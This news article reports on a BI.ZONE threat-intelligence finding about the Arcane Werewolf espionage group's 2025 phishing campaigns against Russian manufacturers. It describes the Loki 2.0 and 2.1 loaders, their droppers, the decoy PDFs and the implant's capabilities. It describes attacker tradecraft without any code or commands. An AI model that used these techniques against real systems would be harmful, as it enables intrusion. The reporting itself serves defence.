The cyber espionage group known as Arcane Werewolf (also tracked as Mythic Likho) has significantly upgraded its offensive capabilities, targeting Russian manufacturing enterprises with a new iteration of its custom malware.
According to a report by BI.ZONE Threat Intelligence: campaigns observed in October and November 2025 reveal that the group has transitioned from the Loki 2.0 loader to a more sophisticated Loki 2.1 variant, which uses updated delivery mechanisms to evade detection.
The attacks began with the group’s signature technique: phishing emails disguised as official correspondence. These messages contained links directing victims to spoofed websites that meticulously mimicked legitimate Russian manufacturing companies.
In the October campaign, victims were tricked into downloading ZIP archives containing malicious LNK files. Once executed, these files triggered a PowerShell command to retrieve a Go-based dropper disguised as an image file.
This dropper served a dual purpose: it opened a harmless decoy PDF such as “Outgoing notification No. 7784” to distract the user while silently executing the Loki 2.0 loader in the background.
This loader was designed to collect basic host information, encrypt it via AES, and exfiltrate it to a Command and Control (C2) server while awaiting further payloads.
However, the threat landscape evolved rapidly by November 2025. BI.ZONE researchers observed a shift in the attack chain involving a new C++ dropper.
This executable utilized low-level system calls like NtCreateFile and ZwWriteFile to extract its payload. More importantly, this campaign marked the deployment of Loki 2.1.
Unlike previous versions where the loader had to fetch the implant from a C2 server, the Loki 2.1 loader carried the upgraded implant embedded directly within its own configuration.
It decrypts and executes the implant directly in the process memory, reducing network noise and dependency on external retrieval during the initial infection phase.
The dropper carries two Base64‑encoded payloads:
chrome_proxy.pdf, a PE32+ executable (malicious loader).09.2025.pdf, a PDF decoy.
The Loki 2.1 implant maintains compatibility with popular post-exploitation frameworks such as Mythic and Havoc but introduces distinct architectural changes.
The primary technical difference lies in command identification; while Loki 2.0 mapped commands to djb2 hash values, Loki 2.1 utilizes a streamlined ordinal number system (0–11).
The arsenal available to Arcane Werewolf through Loki 2.1 is extensive. The toolkit allows the attackers to:
- Manage Files: Upload and download data between the host and C2 server.
- Execute Code: Run processes via CreateProcessW or inject code (DLLs and shellcode) into target processes.
- Advanced Operations: Execute Beacon Object Files (BOF), manipulate Windows access tokens, and terminate specific processes.
- Persist and Evade: Change sleep intervals to mask traffic and clean up operations via an exit command.
Arcane Werewolf’s continued reliance on brand impersonation remains a critical threat factor. By leveraging domain names that closely resemble those of major industry players and regulators, they exploit the trust inherent in the manufacturing sector.
Organizations are advised to scrutinize incoming correspondence for subtle domain irregularities, as the group continues to refine its technical tradecraft.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.